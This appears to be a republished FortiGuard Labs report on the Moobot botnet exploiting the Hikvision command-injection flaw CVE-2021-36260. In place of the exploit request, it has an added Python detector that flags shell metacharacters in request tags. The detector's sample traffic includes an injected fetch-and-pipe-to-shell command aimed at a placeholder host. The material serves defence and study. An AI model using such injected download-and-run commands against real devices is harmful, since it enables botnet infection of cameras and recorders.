Fortinet Inc.

12/06/2021 | Press release | Distributed by Public on 12/06/2021 11:51

Mirai-based Botnet - Moobot Targets Hikvision Vulnerability

FortiGuard Labs Threat Research Report

Affected platforms: Hikvision products
Impacted parties: IP cameras/NVRs
Impact: An attacker can exploit the vulnerability to launch a command injection attack by sending messages containing malicious commands to the device's web server
Severity: Critical

Last September 18th, a threat researcher released a write-up about a remote code execution vulnerability that affects various products from Hikvision, one of the largest video surveillance brands in the world. Hikvision is a CVE Numbering Authority (CNA); it quickly assigned the CVE number CVE-2021-36260 and released a patch for the vulnerability on the same day as the threat researcher's disclosure. Shortly after, FortiGuard Labs developed an IPS signature to address it.

During our analysis, we observed numerous payloads attempting to leverage this vulnerability to probe the status of devices or to extract sensitive data from victims. One payload in particular caught our attention: it tries to drop a downloader that exhibits infection behavior and that also executes Moobot, a DDoS botnet based on Mirai. In this blog we explain how an attacker delivers this payload through the Hikvision vulnerability, along with details of the botnet.

Stage 0 - Exploitation and Propagation

CVE-2021-36260 results from insufficient input validation, allowing unauthenticated users to inject malicious content into a tag to trigger a command injection attack on a Hikvision product. Below is an example of a request leveraging this exploit:
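The request itself is not reproduced here. As an added defender-side example (not code from the FortiGuard Labs report or from Hikvision firmware), the following Python shows the two sides of the "insufficient input validation in a tag" problem the report describes: an allowlist check that a hardened handler would apply to tag content before it reaches any shell, and a detector that scans request bodies for tag values carrying shell metacharacters. The endpoint path, tag names and sample bodies are constructed placeholders, not taken from the report.

```python
import re

# Shell metacharacters that let injected text break out of a value and run as a command.
# Assumption: the vulnerable handler passed tag content to a shell; the report only
# states "insufficient input validation", so this models the bug class, not the firmware.
SHELL_META = re.compile(r"[;|&`<>\n]|\$\(")

# Allowlist for what a short setting value legitimately looks like (assumed policy).
ALLOWED_VALUE = re.compile(r"[A-Za-z0-9_.-]{1,32}")

# Matches leaf elements only: <tag>text</tag> with no nested markup inside.
TAG_TEXT = re.compile(r"<([A-Za-z][\w-]*)>([^<]*)</\1>")


def extract_tag_values(body: str) -> dict:
    """Return {tag: text} for every leaf element in a request body."""
    return {m.group(1): m.group(2) for m in TAG_TEXT.finditer(body)}


def validate_value(value: str) -> bool:
    """Hardened check: accept only allowlisted characters, reject everything else."""
    return ALLOWED_VALUE.fullmatch(value) is not None


def flag_request(body: str) -> list:
    """Detection: tags whose content carries shell metacharacters or fails the allowlist."""
    return [
        tag
        for tag, text in extract_tag_values(body).items()
        if SHELL_META.search(text) or not validate_value(text)
    ]


def scan_requests(requests: list) -> list:
    """Run the detector over (path, body) pairs; return indices of suspect requests."""
    return [i for i, (_path, body) in enumerate(requests) if flag_request(body)]


# Constructed sample traffic (hypothetical endpoint; placeholder domain).
BENIGN = "<setting><language>en</language></setting>"
SUSPECT = "<setting><language>en; wget http://placeholder.invalid/dl | sh</language></setting>"
SAMPLE_REQUESTS = [("/placeholder/config", BENIGN), ("/placeholder/config", SUSPECT)]

if __name__ == "__main__":
    print("suspect request indices:", scan_requests(SAMPLE_REQUESTS))
```

A production handler would apply `validate_value` before use and invoke any subprocess with an argument list rather than a shell string; the detector is the IPS-style view of the same boundary.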